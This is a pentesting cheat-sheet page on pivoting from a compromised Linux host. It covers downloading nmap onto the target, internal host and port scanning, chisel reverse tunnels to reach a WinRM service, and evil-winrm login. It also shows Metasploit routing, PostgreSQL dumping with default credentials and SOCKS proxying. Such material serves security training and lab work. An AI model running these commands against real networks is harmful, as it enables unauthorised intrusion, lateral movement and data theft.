# Pivoting in Linux

Accessing obtained over one machine to exploit another machine deeper in the network.

### Enumerate Network in Remote Machine <a href="#enumerate-network-in-remote-machine" id="enumerate-network-in-remote-machine"></a>

After entering remote machine, we can enumerate and search other networks.\
Before that if the target machine does not have **`nmap`**, we can upload the binary to target machine.

```shellscript
# Linux 64-bit
wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap
```

When we're ready, let's investigate the network as follow.

```shellscript
# ARP cache
arp -a

# Network hosts, ip addresses
cat /etc/hosts
cat /etc/resolv.conf
nmcli dev show

# Network ranges
nmap 10.0.0.1-255
nmap 172.17.0.1-255
for i in {1..255}; do (ping -c 1 10.0.0.${i} | grep "bytes from" &); done

# Port scan
nmap 10.0.0.2
nmap 172.17.0.2
for i in {1..65535}; do (echo > /dev/tcp/172.17.0.2/$i) >/dev/null 2>&1 && echo $i is open; done
```

### Access to Not Directly Accessible Host <a href="#access-to-not-directly-accessible-host" id="access-to-not-directly-accessible-host"></a>

If we find host and port but cannot directly access from local machine, we can accomplish that by reverse port forwarding.\
For example, assume we found another host **172.16.22.2** and port **5985** in remote machine, then we want to connect the port on the host. Execute the following commands on each machine.

```shellscript
# In local machine
chisel server -p 9999 --reverse

# In remote machine
# replace "10.0.0.1" with your local ip address
chisel client 10.0.0.1:9999 R:5985:172.16.22.2:5985
```

Now we can access to `172.16.22.2:5985` from local machine as follow.

```shellscript
nmap -p 5985 localhost

# Result
PORT     STATE SERVICE
5985/tcp open  wsman
```

After that we can connect to the service.

```shellscript
evil-winrm -u username -p password -i localhost
```

For details, please refer to [Port Forwarding with Chisel](https://hamcodes.gitbook.io/hackersnotes/pivoting-lateral-movement/pivoting/chisel).

### Basic Flow with Metasploit, Meterpreter <a href="#basic-flow-with-metasploit-meterpreter" id="basic-flow-with-metasploit-meterpreter"></a>

```shellscript
msfconsole
msf> use auxiliary/...
msf> run

msf> background

# Upgrade the latest session to meterpreter
msf> sessions -u -1
# Interact with the latest session (meterpreter)
msf> sessions -i -1

# Resolve the remote hostname to an ip address
meterpreter> resolve <variable>

# Background the meterpreter session
meterpreter> background

# Configure the routing table to the destination for 172.28.101.51 (outputted ip of the "resolve" command) to the latest opened session.
msf> route add 172.28.101.51/32 -1

# Configure the routing table to the other destination for 172.17.0.1 (e.g. written in /.dockerenv) to the latest opened session.
msf> route add 172.17.0.1/32 -1

# Print the routing table
msf> route print
```

After modifying the routing table, you can fetch information using the IP (e.g. 172.28.101.51) in msfconsole. For example:

```shellscript
# PostgreSQL
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> run postgres://postgres:postgres@172.28.101.51/postgres

msf> use auxiliary/admin/postgres/postgres_sql
msf> run postgres://postgres:postgres@172.28.101/postgres sql='select * from <table>'
```

* **Socks Proxy**

  It is an intermediate server that supports relaying networking traffic between two machines.

  ```shellscript
  msfconsole
  msf> use auxiliary/server/socks_proxy
  msf> run srvhost=127.0.0.1 srvport=9050 version=4a

  # Check if the socks proxy is running as a background job.
  msf> jobs
  # Stop the socks proxy
  msf> jobs -k <job-id>
  ```

  After that, you can use the [localhost](http://localhost/) using tools like curl, proxychains.

  ```shellscript
  curl --proxy socks4a://localhost:9050 http://172.17.0.1 -v

  proxychains nmap 172.17.0.1
  proxychains ssh <user>@172.17.0.1
  ```